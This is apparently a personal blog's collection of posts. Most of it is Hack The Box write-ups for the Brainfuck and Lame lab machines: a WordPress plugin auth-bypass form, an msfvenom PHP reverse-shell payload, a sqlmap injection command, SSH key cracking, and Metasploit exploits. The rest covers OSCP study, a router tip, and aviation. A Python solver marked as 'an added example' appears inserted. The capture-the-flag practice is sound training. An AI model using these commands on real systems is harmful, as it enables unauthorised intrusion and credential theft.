Brainfuck – Hack The Box

Machine: https://app.hackthebox.com/machines/Brainfuck

Alright, I have to mention this one has intimidated me. It has a level of “insane.”

Let’s start. A simple portscan reveals the following open ports:

$ nmap 10.10.10.17
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-08 06:38 EST
Nmap scan report for 10.10.10.17
Host is up (0.023s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
110/tcp open pop3
143/tcp open imap
443/tcp open https

The SSL cert points to brainfuck.htb, so we better add that to the /etc/hosts file:

10.10.10.17 brainfuck.htb

It seems that it runs a WordPress installation, with a cryptic message: “SMTP Integration is ready. Please check and send feedback to [email protected]”. Some guesses:

  1. Gain access and upload a web shell?
  2. Do something with port 25 as user orestis?

At least we know that the admin user is called “admin”. Otherwise, our very helpful login page tells us that the user doesn’t exist:

Using wpscan we find the following helpful information:

$ wpscan --disable-tls-checks --url "https://brainfuck.htb/"
[+] XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
[+] WordPress readme found: https://brainfuck.htb/readme.html
[+] The external WP-Cron seems to be enabled: https://brainfuck.htb/wp-cron.php
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
[+] WordPress theme in use: proficient
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[+] wp-support-plus-responsive-ticket-system version 7.1.3

Nice, a smörgåsbord of possibilities. The plugin “Support Plus Responsive Ticket System 7.1.3” has two public exploits:

  1. Privilege Escalation: https://www.exploit-db.com/exploits/41006
  2. SQL Injection: https://www.exploit-db.com/exploits/40939

Let’s try to authenticate as admin using the following HTML code:

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="admin">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Oui oui, je suis admin!

Now let’s create a nice Meterpreter reverse_tcp PHP payload:

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f raw -o shelly.php

And paste it in the bottom of footer.php at https://brainfuck.htb/wp-admin/theme-editor.php?file=footer.php&theme=proficient

Oh wait, there is no save button. Oh wait, the file is not writable! Argh… You see, guys, I’m not making this up. This is me trying to solve the CTF in real-time.

Let’s try the SQL injection vulnerability. Maybe something helpful is hidden in the depths of MySQL.

According to the exploit, the POST parameter “cat_id” in the wp-admin/admin-ajax.php path is vulnerable. This sqlmap command dumps the database:

sqlmap --dbms=mysql -u "https://brainfuck.htb/wp-admin/admin-ajax.php" --method POST --data "action=wpsp_getCatName&cat_id=0" -p cat_id --cookie='PASTE_HERE_COOKIES_FROM_AN_AUTHENTICATED_SESSION' --level 3 --risk 3 --dump

This will take some time, get some coffee and watch a couple of Mr. Robot episodes on Netflix. There are probably more efficient ways of extracting the database, but I feel lazy right now.

Oh wait (again), while lazy-browsing around I found this page, containing the following SMTP credentials at https://brainfuck.htb/wp-admin/options-general.php?page=swpsmtp_settings

SMTP username: orestis
SMTP password: kHGuERB29DNiNE

Using these credentials, we can authenticate towards the POP3 server (likely also the IMAP) using Thunderbird and fetch the emails for user orestis. There is an interesting message from root:

Hi there, your credentials for our "secret" forum are below 😄

username: orestis
password: kIEnnfEKJ#9UmdO

Regards

Looking at the SSL certificate for brainfuck.htb we can find the “secret” forum:

$ echo "" | openssl s_client -connect brainfuck.htb:443 > cert.key; openssl x509 -in cert.key -text -noout | grep DNS
...
DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb

Which we add to /etc/hosts and visit the URL https://sup3rs3cr3t.brainfuck.htb/

After we authenticate using the aforementioned credentials, we see the following interesting conversation in the forum at https://sup3rs3cr3t.brainfuck.htb/d/3-key

This looks like a cipher. If we look at orestis’ profile, we can see he always signs his messages with the following:

Orestis - Hacking for fun and profit
Pieagnm - Jkoijeg nbw zwx mle grwsnn
Wejmvse - Fbtkqal zqb rso rnl cwihsf
Qbqquzs - Pnhekxs dpi fca fhf zdmgzt

We can safely assume that these strings mean the same thing. Knowing a common factor across several messages is partially how Rejewski cracked the Enigma cipher. Do we have something similar here?

We can also safely assume that this is the link to the SSH key, and thus something like:

https://brainfuck.htb/...
mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja

Now let’s try to solve this. If we calculate the distances and arrange them like so, we can see a kind of pattern:

If we try to fill in the blanks, and “re-arrange” the parts of the sequence that repeat, we get something like this:

After many hours of sweat and tears (aka decoding a small piece, using it to get new offsets, decoding another small piece, etc…), I finally managed to decode the messages by writing a small PHP script (why PHP? I hate snakes):

<?php
$key = [21,6,24,16,14,2,25,9,0,18,13]; # Same as above but modulo 26.

$texts = [];
$texts []= "Mya qutf de buj otv rms dy srd vkdof :) Pieagnm - Jkoijeg nbw zwx mle grwsnn";
$texts []= "Xua zxcbje iai c leer nzgpg ii uy...";
$texts []= "Ufgoqcbje.... Wejmvse - Fbtkqal zqb rso rnl cwihsf";
$texts []= "Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg :) mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja";
$texts []= "Si rbazmvm, Q'yq vtefc gfrkr nn ;) Qbqquzs - Pnhekxs dpi fca fhf zdmgzt";

foreach ($texts as $text) {
    $di = 0;
    for ($i = 0; $i < strlen($text); $i++) {
        
        if (ctype_alpha($text[$i])) {
            $c = ord($text[$i]);
            $shift = $key[$di++ % count($key)];
            $cn = $c + $shift;

            if ($c >= ord("a") && $c <= ord("z")) {
                while ($cn < ord("a")) $cn += 26;
                while ($cn > ord("z")) $cn -= 26;
            } else if ($c >= ord("A") && $c <= ord("Z")) {
                while ($cn < ord("A")) $cn += 26;
                while ($cn > ord("Z")) $cn -= 26;
            }

            echo chr( $cn );

        } else {
            echo $text[$i];
        } 
    }
    echo "\n";
}
?>

It is sort of an XOR cipher, but with modulo 26 addition instead of XOR and offset by the ASCII value for “a” or “A.”

PS from the next day: Apparently, this is the “Vigenère cipher,” and the password is “FUCKMYBRAIN.” Look at this beauty:

$ php -r 'foreach (str_split("FUCKMYBRAIN") as $c) echo (1+ord("Z")-ord($c)).",";';
21,6,24,16,14,2,25,9,26,18,13, # Same as I came up with


I’m proud that I managed to solve it without any knowledge of what a Vigenère cipher is.

Running my script gives us the solution:

$ php decode.php 
Hey give me the url for my key bitch :) Orestis - Hacking for fun and profit
Say please and i just might do so...
Pleeeease.... Orestis - Hacking for fun and profit
There you go you stupid fuck, I hope you remember your key password because I dont :) https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
No problem, I'll brute force it ;) Orestis - Hacking for fun and profit

Don’t you love their chemistry? I certainly do.
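The known-plaintext recovery described above can also be automated. The following is an added example, not the author's script: it derives the key from the repeated signature, finds the key length as the shortest repeating period, and decrypts a message that carries no signature. The function names are hypothetical, and it assumes the signature sits at the end of a message and that only ASCII letters consume a key position (as in the PHP script above).

```python
import string

# Ciphertexts copied from the forum thread quoted in this post.
SIGNED = [
    "Mya qutf de buj otv rms dy srd vkdof :) Pieagnm - Jkoijeg nbw zwx mle grwsnn",
    "Ufgoqcbje.... Wejmvse - Fbtkqal zqb rso rnl cwihsf",
    "Si rbazmvm, Q'yq vtefc gfrkr nn ;) Qbqquzs - Pnhekxs dpi fca fhf zdmgzt",
]
UNSIGNED = "Xua zxcbje iai c leer nzgpg ii uy..."
CRIB = "Orestis - Hacking for fun and profit"  # known plaintext (the signature)


def is_letter(ch):
    return ch in string.ascii_letters


def keystream_from_crib(ciphertext, crib):
    """Return (letters before the crib, shift per crib letter), shift = (c - p) mod 26."""
    tail = ciphertext[-len(crib):]
    for p, c in zip(crib, tail):
        # Punctuation and spaces are not encrypted, so they must match exactly.
        if is_letter(p) != is_letter(c) or (not is_letter(p) and p != c):
            raise ValueError("crib does not line up with the end of the message")
    offset = sum(is_letter(ch) for ch in ciphertext[:-len(crib)])
    shifts = [(ord(c.lower()) - ord(p.lower())) % 26
              for p, c in zip(crib, tail) if is_letter(p)]
    return offset, shifts


def smallest_period(shifts):
    """Shortest p such that the shift sequence repeats every p letters."""
    for p in range(1, len(shifts)):
        if all(shifts[i] == shifts[i + p] for i in range(len(shifts) - p)):
            return p
    return len(shifts)


def recover_key(ciphertext, crib):
    offset, shifts = keystream_from_crib(ciphertext, crib)
    period = smallest_period(shifts)
    if 2 * period > len(shifts):
        raise ValueError("crib too short to confirm a repeating key")
    key = [0] * period
    for j, shift in enumerate(shifts):
        # Rotate so that key[0] lines up with the first letter of the message.
        key[(offset + j) % period] = shift
    return "".join(chr(ord("A") + s) for s in key)


def vigenere_decrypt(text, key):
    out, i = [], 0
    for ch in text:
        if is_letter(ch):
            base = ord("a") if ch.islower() else ord("A")
            k = ord(key[i % len(key)]) - ord("A")
            out.append(chr((ord(ch) - base - k) % 26 + base))
            i += 1  # the key only advances on letters
        else:
            out.append(ch)
    return "".join(out)


def solve():
    keys = {recover_key(msg, CRIB) for msg in SIGNED}
    if len(keys) != 1:
        raise ValueError("signed messages disagree on the key: %r" % keys)
    key = keys.pop()
    return key, vigenere_decrypt(UNSIGNED, key)


if __name__ == "__main__":
    key, plain = solve()
    print(key)
    print(plain)
```

All three signed messages yield the same key even though the signature starts at a different key position in each, which is the cross-check that the period and rotation are right.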

Anyways, now we can download the private key and try to log in to the machine using SSH:

$ wget --no-check-certificate https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
$ chmod 600 id_rsa
$ ssh -l orestis -i id_rsa brainfuck.htb
Enter passphrase for key 'id_rsa':

Oh well, fuck. We have to brute force the private key password:

$ ssh2john id_rsa > id_rsa.john
$ john id_rsa.john --wordlist=/usr/share/wordlists/rockyou.txt
3poulakia! (id_rsa)

And the password has been found. By the way, it means “3 small birds” in Greek. Που κάθονταν τα τρια πουλάκια ρε μεγάλε Ορέστη;

May we finally log in to the machine?

$ ssh -l orestis -i id_rsa brainfuck.htb      
Enter passphrase for key 'id_rsa': (3poulakia!)
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


You have mail.
Last login: Mon Oct  3 19:41:38 2022 from 10.10.14.23
orestis@brainfuck:~$ id
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)

YES! And the user flag is:

$ cat user.txt
2c11*************************************

Now let’s get root.

Ehm, I got root very quickly. I don’t think this was the intended path (old machine/new exploits). Basically, I upgraded to a meterpreter shell, ran the post/multi/recon/local_exploit_suggester module, and then ran the exploit/linux/local/bpf_sign_extension_priv_esc module, which was one of the many exploits suggested. I instantly got root, and the flag was right there:

meterpreter > cat /root/root.txt
6efc********************************

But let’s try to get root the way we were intended to. If we look in orestis’ home dir, there is a script named encrypt.sage that encrypts the root flag and saves it in /home/orestis/output.txt. It looks like an RSA encryption implementation in SageMath. SageMath is a Python-based open-source scripting language for mathematicians. All the values used during encryption, including p, q and e, are available in /home/orestis/debug.txt.

nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)

n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)

c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')

Using the information available, I wrote another SageMath script that decrypts the root flag:

# The encrypted message
c = Integer(int(open("output.txt").read().split(" ")[2].strip()));

# Values that were used during encryption
p = Integer(int(open("debug.txt").read().split('\n')[0].strip()));
q = Integer(int(open("debug.txt").read().split('\n')[1].strip()));
e = Integer(int(open("debug.txt").read().split('\n')[2].strip()));
phi = (p-1)*(q-1)
n = p*q

# In RSA, the decryption key d is the multiplicative inverse of e modulo phi.
# We compute it as such:
d = pow(e, -1, phi)

# And thus the remainder of e*d divided by phi must be equal to 1:
print "This must be equal to 1: " + str((e*d) % phi)

# Now that we have the decryption key d we decrypt message c as such:
m = pow(c, d, n)

print "Root flag: " + ('%x' % int(m)).decode('hex')

And tada, we get the same flag once again:

$ sage decrypt.sage
This must be equal to 1: 1
Root flag: 6efc********************************

What did we learn from this box? Two things for me:

  1. Even “insane” machines have a solution given enough time.
  2. Older machines are most certainly easier to root using new exploits and vulnerabilities, but maybe I should stick to the intended path if I want to learn something.

Lame – Hack The Box

Machine: https://app.hackthebox.com/machines/Lame

Since this is the first machine for this journey, let’s start by downloading the OpenVPN configuration from HTB and creating a quick alias to connect (I will be using Kali Linux by the way, not the integrated Pwnbox):

$ echo "alias htb='sudo openvpn /home/kali/VPNs/htb.ovpn'" >> ~/.zshrc (or ~/.bashrc)

Logout / Login and then:

$ htb

Let’s start with a plain nmap:

$ nmap 10.10.10.3
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-08 04:22 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.04 seconds
$ ping 10.10.10.3
PING 10.10.10.3 (10.10.10.3) 56(84) bytes of data.
64 bytes from 10.10.10.3: icmp_seq=1 ttl=63 time=22.0 ms
64 bytes from 10.10.10.3: icmp_seq=2 ttl=63 time=22.6 ms
...

Nmap is immediately lying when it claims that the machine doesn’t respond to ping. You need to add the -Pn flag to scan a machine that doesn’t “respond to ping”:

$ nmap 10.10.10.3 -Pn
...
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

It seems the machine has SMB shares, let’s enumerate them:

$ smbclient -L 10.10.10.3
Password for [WORKGROUP\kali]: (empty)
Anonymous login successful

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
tmp             Disk      oh noes!
opt             Disk      
IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Server                   Comment
---------                   -------
Workgroup            Master
---------                   -------
WORKGROUP     LAME

“oh noes!”? lol. Lame, I guess? Let’s see what we find in tmp:

$ smbclient //10.10.10.3/tmp
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 8 04:31:20 2023
.. DR 0 Sat Oct 31 03:33:58 2020
.ICE-unix DH 0 Sun Jan 8 04:20:46 2023
vmware-root DR 0 Sun Jan 8 04:21:13 2023
.X11-unix DH 0 Sun Jan 8 04:21:12 2023
.X0-lock HR 11 Sun Jan 8 04:21:12 2023
vgauthsvclog.txt.0 R 1600 Sun Jan 8 04:20:44 2023
5574.jsvc_up R 0 Sun Jan 8 04:21:50 2023

7282168 blocks of size 1024. 5386552 blocks available

Of these files, only vgauthsvclog.txt.0 and .X0-lock are downloadable, and they contain no valuable information. None of the other shares seems to be useful either. Maybe we need to find some credentials first.

The other open services did not accept connections without credentials either. However, I noticed generally outdated software running. Let’s do a deeper scan and see if there is a vulnerability we can find:

$ sudo nmap -Pn -script vuln,default -p21,22,139,445 -sV -O 10.10.10.3

It turns out Samba 3.0.20-Debian is vulnerable to CVE-2007-2447. Use the Metasploit framework and apply the multi/samba/usermap_script module:

whoami
root
cat /root/root.txt
c3a***************************************
cat /home/makis/user.txt
e14***************************************

There are a few more interesting paths on this machine. My guess is there is more than one way to the flags, but I will leave this up to you to explore!

So what did we learn from this machine? Sometimes a host is so open you don’t know where to start =).

PS: Γεια σου Μάκη!

Path to OSCP/PEN-200

Over the next few months (years?) I will document my attempt to obtain the OSCP certification on this blog. By doing my own research online, I have concluded that probably the following path is the most optimal:

  1. Complete the Offensive Pentesting TryHackMe learning path – Done.
  2. Complete TJ_Null’s list of Hack The Box OSCP-like machines.
  3. Enroll in the OSCP/PEN-200 course and complete your certification.

As evident by the list above, I have completed the first step:

So the next step is to complete TJ_Null’s list.

I’m aware that many other security professionals have done similarly in the past, and this is my way of learning while returning to this site and reviewing my notes. As a bonus, you can use my notes in your journey should you decide to take the OSCP certification.

By the way, here is my Hack The Box profile, and yes, sadly, you will need a VIP subscription to be able to access retired machines. I purchased the annual subscription and canceled it immediately so that it doesn’t surprise me by renewing automatically in a year.

Want to follow my journey in real time? Subscribe to this site’s RSS feed (yes, this still is a thing).

ForeFlight Sentry Firmware

WARNING: Do not use these firmware files on anything unless you know what you are doing. You WILL void your warranty when using firmware from unofficial sources.

Ah, ForeFlight (uAvionix cough cough) sure knows how to restrict your freedom when it comes to upgrading or downgrading your Sentry firmware.

But fear not, for Uncle Dimme is here to save the day!

By the way, I strongly advise against using any of these files for any purpose. I cannot accept any responsibility whatsoever… Seriously, I won’t take any blame.

Oh, and if you’re not a fan of the filenames, remember to direct your frustrations towards Alonzo!

Telia Sagemcom and 1.1.1.1

If you are unfortunate enough to have been given a Telia WiFi router model F@st 5370e made by Sagemcom, you may have experienced that IP 1.1.1.1 is unreachable. [1, 2, 3]

1.1.1.1 is a public DNS server provided by Cloudflare that many of us prefer to use, instead of, let’s say, Telia’s own snooping DNSes or Google’s 8.8.8.8. Of course, an alternative is to use 1.0.0.1, which also provides the same service by Cloudflare, but where is your backup DNS in that case?

The reason it is unreachable is that the router is using this IP internally for an interface called “IP_BR_LAN_LXC“. LXC is a userspace interface that can be used to create and manage application containers.

You can disable the “IP_BR_LAN_LXC” interface by following the instructions given below:

  1. Log in to your router’s “admin” (sic) interface by browsing to http://192.168.1.1
  2. If you’re using Firefox or Chrome, press “F12” and navigate to the “Console” tab.
  3. Enter the following command and press Enter: $.xmo.setValuesTree(false,"Device/IP/Interfaces/Interface[Alias='IP_BR_LAN']/IPv4Addresses/IPv4Address[Alias='IP_BR_LAN_LXC']/Enable");

That’s it, 1.1.1.1 should now be reachable. I have not experienced any issues by disabling this interface. Maybe I’ve blocked Telia from using some remote tools to mess with my router? I call this a win in that case. If for some reason, you want to reverse the setting above and re-enable this interface, you can do so by typing the following command into the console:

$.xmo.setValuesTree(true,"Device/IP/Interfaces/Interface[Alias='IP_BR_LAN']/IPv4Addresses/IPv4Address[Alias='IP_BR_LAN_LXC']/Enable");

Bonus: While you’re at it, block 8.8.8.8 and 8.8.4.4 from your network. Reason? Android, and in general Google devices, are using this DNS regardless of your DHCP settings. You can block them by going to this hidden path in your router and adding 8.8.8.8 and 8.8.4.4:

http://192.168.1.1/0.1/gui/#/access-control/parental-control/filtering

PS: You can either change the DNS servers on a per-device basis, or you can change the DNS servers that your DHCP server is announcing to your local network. This can be done using the following hidden URL:

http://192.168.1.1/0.1/gui/#/mybox/dns/server

DISCLAIMER: I don’t take any responsibility for any of your actions blah blah blah…

Mollymawk tests

Yes, I am alive. I know I haven’t posted anything in three years. There are many reasons behind this, but I will leave this for another time.

As I mentioned in an earlier post, I got into this aviation thing back in 2015. Since then, I have taken it further and completed a commercial pilot’s license with multiple engine and instrument ratings and some other stuff. What does this all mean? I can now fly the big birds for money if an operator decides to hire me. But to the big question, how do you get an operator to hire you?

It is not a simple task; you have to submit countless applications and be prepared never to hear back from anyone. They say there is a pilot shortage, hmm…? If you are lucky, you might be called to an assessment. What? You don’t know what an assessment is? Don’t worry. I got you covered.

In the aviation industry, assessments are what job interviews are in any other field of work. But since pilots are rich (we are rich, right? somebody, please confirm?), assessments have to be complicated, money- and time-consuming processes. I was partially lucky and got called to an assessment for an operator called SunExpress. Spoiler alert: I didn’t get the job. I have nothing but good things to say about SunExpress. They are very professional in what they are doing and have high standards for their pilots. The reason I failed in my assessment is purely my own fault.

It basically works like this: You get a phone call, which is some kind of unofficial first interview. If they are happy with you after the phone call, you get invited to do an online ITEP English proficiency test. If you pass the ITEP test, you get invited to do some psychometric tests at SunExpress’s own premises. If you pass the psychometric tests, you get invited to do a simulator test-flight in a full-motion Boeing 737-800 simulator. The simulator was a lot of fun to fly, but this is as far as I got. If you pass the simulator test, you get invited to a formal interview, and if you pass the interview, you get the job! Phew…

Boeing 737-800 Full Motion Simulator

So what are the psychometric tests? They are the Mollymawk psychometric tests, also used by other operators like CargoLux and Pegasus Airlines. They are split into two categories: skill tests and aptitude tests. The skill tests test your knowledge in math, science, and English. Those were the easy ones for me. The aptitude tests test your memory, orientation skills, and ability to multitask, divided into three computer “games” named “Working Memory”, “Spatial Orientation”, and “Time Sharing”.

To do the Mollymawk tests, you have to purchase two packages: skill and aptitude tests. Each package costs 150€, and if you fail one subject or game in one package, you have to re-purchase the whole package to do the failed test again. The first time I did the Mollymawk tests, I passed the skill tests but failed the aptitude tests. Thus I had to re-purchase the aptitudes package to do the tests a second time. Luckily the second time, I passed. You only get one second chance. In total, I spent 450€, not counting travel expenses, as a part of what essentially is a job interview for a job that I didn’t get.

I felt that more practice would give me a better chance to pass the aptitude tests on the first go. The aptitude tests are essentially a form of primitive computer games. When you purchase the aptitudes package, they give you 10 practice runs in each game you can play at home. They argue that the learning curve is logarithmic and that after 10 practice runs, you have asymptotically reached your optimum ability in playing the games, but I doubt that. As anyone knows, practice makes perfect. So I decided to code my own version of the games and help other pilots truly reach the optimum before doing the final tests.

I have created a Mollymawk test practice website, where I have implemented my own version of the Mollymawk games. A user can register an account and purchase one of the three time-limited packages for playing the games. The games may be played unlimited times!

I have also implemented an interface for the users to track their progress as they are getting better:

Why do I ask for money and not put it out for free if I truly care about the other pilots? Somehow, I have to make back the money I lost during my earlier “job interviews”. After all, pilots are rich. We rich guys, right? Do we have no problems paying 19€ instead of 150€ for doing the tests a second time?

Anyhow, if you are a pilot and in need of my services, I truly hope I helped and wish you the best of luck!

And remember, when in doubt, go around! (preferably above 1000 feet GND in IMC, unlike me).

The BlackWing

BlackWing is a Swedish light sport aircraft manufacturer. They are based in Eslöv, Sweden, and currently have a couple of models available for purchase. One is registered as an Ultralight and the other one as Experimental. When the paperwork is ready, they will also offer the BlackWing as a CS-LSA.

The development of the BlackWing has been focused on creating a very efficient aircraft with great flying characteristics and high safety standards while still using modern cutting-edge technology. And did I mention that the whole thing is made in pre-preg carbon fiber?

Visit their website for more information and watch my video review below.

http://www.blackwing.aero/

Flying airplanes and living life

So I haven’t written anything on this website for quite some time. Nothing much has happened since my last post, besides one little thing. I took my private pilot’s license (PPL), which I am very proud of. I am certified to fly small single-engine piston (SEP) airplanes up to 5700 kg and land them on land, not water. This happened at the end of June 2015, so it has actually been a while. Since then, I have logged a little more than 70 hours of flight time, mainly on Cessnas 172 and 152. In September 2015, I started working on my night rating (NQ) to fly during the night. I still have one hour of flight left before I get this rating, but the school, some school in south Sweden (ha!) that I went to, had their teaching permission revoked due to some administrative hurdles. Hopefully, they will get it back sometime in March, and I will finish my rating.

One more thing that I have been doing is studying ATPL theory at TFHS, the aviation school of Lund University (I can’t seem to detach myself from this university). I’m still at the stage where I’m doing my school exams before moving on to the EASA exams. I should complete those sometime in early summer (ha-ha summer in Sweden), and then I should attempt the EASA exams. A really nice tool for helping me in my ATPL studies is the aviation exam. They are not paying me anything for writing about them here, I really find them useful, and I want to share my experience with other students.

So long people, be happy and enjoy life!

Oh, and by the way, here is a video of the first flight of the year in snowy Sweden:

First solo and first cross-country solo flight

My 30th hour in the air is approaching. The required hours for a PPL license are 45. I really like flying. It’s something that grows on you. So far, I have performed a few hours of solo flight, which means that you are alone in the cockpit flying the airplane. The cross-country solo flight is a longer solo flight in which you navigate to a nearby airport. Enjoy the videos!